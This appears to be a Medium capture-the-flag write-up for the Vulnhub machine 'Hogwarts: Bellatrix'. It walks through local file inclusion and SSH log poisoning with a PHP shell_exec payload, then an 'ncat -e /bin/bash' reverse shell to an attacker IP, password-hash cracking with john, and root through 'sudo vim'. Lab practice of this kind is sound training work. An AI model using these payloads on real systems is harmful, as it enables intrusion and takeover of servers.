Hogwarts: Bellatrix Vulnhub (Writeup)

Difficulty: Pure Intermediate

#NMAP:

-sC : Default Script

-sV : Version Scan

-A : Aggressive Scan

-p- : Scan all ports TCP/UDP

-oN : Output of text

Navigate on the IP

we have the first hint in the source page, so let’s add it as a directory

Add ikilledsiriusblack.php and let’s review the source page and find a valid parameter to add.

#LFI (Local File Inclusion):

Ok now I didn’t really know what to do, the information was too little, so I found on google an interesting directory /var/log/auth.log where it is possible to ssh-log- poisoning.

#SSH-LOG-POISONING:

I release this article that I found, it could be very useful. So navigate on /var/log/auth.log

Ok now is possible you can ssh log poisoning, you can follow the article or do your own thing. I found a really good command.

ssh ‘<?php echo shell_exec($_GET[“jin”]);?>’@192.168.1.133

Add the parameter “jin” and let’s see if it works. Remember while running the command do CTRL + C and go to the URL

Now with the “jin” parameter we can write and check if ssh-log-poisoning really worked, you can write whatever you want, for example “id”, “ls -la”, “whoami”
etc..

ok it looks like the “jin” parameter worked. Remeber add &jin=

Ok it works now! The time has come to load our malicious payload, I have tried various payloads that I have found on the web, but none seem to work, in the end after hours of trying, I have found the right payload.

ncat -e /bin/bash 192.168.1.115 1234 (add this in url)

it’s time to launch it, remember make sure you are listening on the given door.

nc- lnvp 1234

And we are INNNN!!!!!

Now enumerate www-data

#Enumeration:

I found this file and it appears to be base 64 let’s decrypt it.

Wow we have found secrets, but what is this? A password? to directory? No it was a rabbit hole, that encode was just the directory itself, let’s browse.

Ok inside the secret directory we find 2 files, the first “.dic” seem to be passwords !! While the second file appears to be a hash.

Copy all passwords and put them inside a file.

Here we find the hash instead. I used john to crack the password. But you could use hashcat with -m 1800. (sha512crypt) Remember to use the wordlist found.

YESSSS We have the password for “lestrange”. For convenience we log in with

ssh lestrange@IP and the password found on another shell.

#Horizontal Privilege Escalation:

First thing I did is see if there is any vulnerability in sudo.

Ok we can use vim to become root, in this case use this link, it might be useful:

https://gtfobins.github.io/

And we are ROOT!!! Command: sudo /usr/bin/vim -c ‘:!/bin/sh’

I hope I have been useful to you. Good luck guys.

--

--

--

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

SOC104 — Malware Detected Alert: A Walkthrough

A Marketer’s Guide to GDPR

{UPDATE} Verformung Pixel Hack Free Resources Generator

35K Android Hacked Apps ⚙

Finally, InsureDAO testnet is out on Rinkeby testnet today, 6th August at 4:00 PM (UTC) !!

Fundamentals of Hash algorithms and brief explanation of SHA1 algorithm.

ICON in Numbers #12 (week 37–2020)

Exploring Amazon Cash — An Experiment with Fraud

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xJin

0xJin

| eCPTX | C|EH Master | CompTIA Security + | eJPT |

More from Medium

HTB - Sick Rop [Pwn]

Pen tests. Conduct, automate or not worry?

0day Try Hack Me Walkthrough